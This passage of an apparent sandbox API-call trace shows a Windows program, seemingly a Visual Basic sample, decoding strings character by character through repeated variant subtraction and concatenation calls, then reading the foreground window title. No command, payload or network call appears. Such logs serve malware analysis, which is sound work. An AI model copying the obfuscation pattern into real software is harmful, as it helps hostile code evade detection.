pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0201.515] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.515] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.515] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.516] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.516] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0201.516] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.517] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0201.517] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.518] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0201.518] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.518] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.519] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0201.519] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.520] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.520] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.520] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0201.521] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.521] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.521] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0201.522] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.522] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.522] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.523] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0201.523] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.529] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.529] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.529] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.530] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.530] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.530] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.531] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.531] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.531] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.532] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.532] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.532] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.532] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.533] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.533] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0201.533] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.534] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.534] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.535] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.535] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.535] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0201.536] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.536] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.536] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.536] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.537] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.537] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.537] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.538] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.538] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.539] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.539] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.539] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.542] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.542] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.542] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.543] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.543] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.544] GetForegroundWindow () returned 0x2035c [0201.544] GetLastError () returned 0x0 [0201.544] SysStringLen (param_1=" ") returned 0xff [0201.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0201.544] SysStringLen (param_1=" ") returned 0xff [0201.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0201.545] GetWindowTextA (in: hWnd=0x2035c, lpString=0x11644c4, nMaxCount=255 | out: lpString="Desktop") returned 7 [0201.545] GetLastError () returned 0x0 [0201.545] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0201.545] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.545] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Desktop") returned 256 [0201.545] SysStringLen (param_1="Desktop") returned 0x8 [0201.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Desktop", cchWideChar=9, lpMultiByteStr=0x11684fc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desktop", lpUsedDefaultChar=0x0) returned 9 [0201.546] SetWindowTextA (hWnd=0x103c4, lpString="Desktop") returned 1 [0201.546] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0201.546] GetFocus () returned 0x0 [0201.546] lstrlenA (lpString="Desktop") returned 7 [0201.547] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0201.547] IsWindow (hWnd=0x103c4) returned 1 [0201.547] IsWindow (hWnd=0x103c4) returned 1 [0201.548] IsWindow (hWnd=0x103c4) returned 1 [0201.548] IsWindow (hWnd=0x103c4) returned 1 [0201.548] GetFocus () returned 0x0 [0201.549] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x7 [0201.549] GetFocus () returned 0x0 [0201.549] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x8) returned 0x10ebcd0 [0201.549] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x8, lParam=0x10ebcd0) returned 0x7 [0201.549] GetFocus () returned 0x0 [0201.549] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0201.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=8 | out: lpWideCharStr="Desktop") returned 8 [0201.550] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0201.550] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0201.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.552] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.552] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0201.552] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.553] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.553] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0201.553] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.554] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0201.554] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.555] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.605] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0201.605] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.606] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.606] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0201.607] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.608] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.608] VarCat (in: pvarLeft=0x28f208, 